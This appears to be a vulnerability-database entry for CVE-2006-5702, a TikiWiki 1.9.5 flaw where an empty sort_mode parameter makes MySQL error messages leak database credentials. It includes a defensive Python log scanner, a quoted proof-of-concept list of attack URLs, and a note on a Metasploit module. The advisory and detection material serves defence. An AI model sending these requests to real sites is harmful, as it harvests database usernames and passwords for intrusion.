CVE-2006-5702
Published 2006-11-04
Priority: P3 42 | medium 5 | CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: available
EPSS: 53.07% (98.8th percentile)
Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php, and (21) tiki-webmail_contacts.php, which reveal the information in certain database error messages.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiki | tikiwiki_cms_groupware | — | — |
Detection & IOCs
- Trigger condition is an empty (blank) `sort_mode` GET parameter submitted to any of the 21 vulnerable TikiWiki PHP scripts; the resulting MySQL error message leaks the database username and password in the HTTP response body.
- Detect HTTP requests to TikiWiki paths containing `sort_mode=` with an empty value (i.e., `sort_mode=` at end of query string or followed by `&`). No authentication is required; the issue is exploitable by anonymous users.
- A Metasploit auxiliary module exists for this vulnerability under `auxiliary/admin/tikiwiki/tikidblib`, enabling automated exploitation for credential harvesting.
- Vulnerability is confirmed only in TikiWiki version 1.9.5 (CVS) -Sirius-; other versions are not confirmed affected by the sources.
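The detection condition above can be checked against web server access logs. The following is an added example, not a rule from this page or from the TikiWiki project; it assumes common/combined log format, and the sample log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The 21 scripts named in the CVE description (without the .php suffix).
SCRIPTS = frozenset("""tiki-listpages tiki-lastchanges messu-archive messu-mailbox
messu-sent tiki-directory_add_site tiki-directory_ranking tiki-directory_search
tiki-forums tiki-view_forum tiki-friends tiki-list_blogs tiki-list_faqs
tiki-list_trackers tiki-list_users tiki-my_tiki tiki-notepad_list
tiki-orphan_pages tiki-shoutbox tiki-usermenu tiki-webmail_contacts""".split())

# Assumed log layout: client ... "METHOD target PROTO" status ...
LINE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def empty_sort_mode(target):
    """True if target requests a listed script with a blank sort_mode value."""
    parts = urlsplit(target)
    name = parts.path.rsplit("/", 1)[-1].lower()
    if not name.endswith(".php") or name[:-4] not in SCRIPTS:
        return False
    # keep_blank_values retains "sort_mode=" pairs; parse_qsl URL-decodes first.
    # Treating whitespace-only values as blank is an assumption of this example.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return any(k == "sort_mode" and v.strip() == "" for k, v in pairs)

def scan(lines):
    """Return (client, target, status) for every matching log line."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if m and empty_sort_mode(m["target"]):
            hits.append((m["client"], m["target"], int(m["status"])))
    return hits

# Constructed sample lines using documentation addresses, not real traffic.
SAMPLE = [
    '192.0.2.10 - - [04/Nov/2006:10:00:01 +0000] "GET /tiki/tiki-listpages.php?offset=0&sort_mode= HTTP/1.1" 200 5120',
    '192.0.2.10 - - [04/Nov/2006:10:00:02 +0000] "GET /tiki/messu-sent.php?sort_mode=&offset=0 HTTP/1.1" 200 4980',
    '198.51.100.7 - - [04/Nov/2006:10:05:00 +0000] "GET /tiki/tiki-listpages.php?sort_mode=pageName_asc HTTP/1.1" 200 20311',
    '198.51.100.7 - - [04/Nov/2006:10:05:09 +0000] "GET /tiki/tiki-index.php?sort_mode= HTTP/1.1" 200 1833',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit means the request matched the trigger condition, not that credentials were disclosed; confirming disclosure requires checking whether the response for that request contained a database error message.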
No detection rules found.
Exploit-DB
TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
exploitdb·2006-11-01
CVE-2006-5703 TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
---
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
There's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
An anonymous user can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var, with the following links:
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sor
Metasploit
TikiWiki Information Disclosure
metasploit
A vulnerability has been reported in Tikiwiki, which can be exploited by an anonymous user to dump the MySQL user & passwd just by creating a mysql error with the "sort_mode" var. The vulnerability was reported in Tikiwiki version 1.9.5.
No writeups or analysis indexed.
- http://secunia.com/advisories/22678
- http://secunia.com/advisories/23039
- http://security.gentoo.org/glsa/glsa-200611-11.xml
- http://securityreason.com/securityalert/1816
- http://www.securityfocus.com/archive/1/450268/100/0/threaded
- http://www.securityfocus.com/bid/20858
- http://www.vupen.com/english/advisories/2006/4316
- https://exchange.xforce.ibmcloud.com/vulnerabilities/29960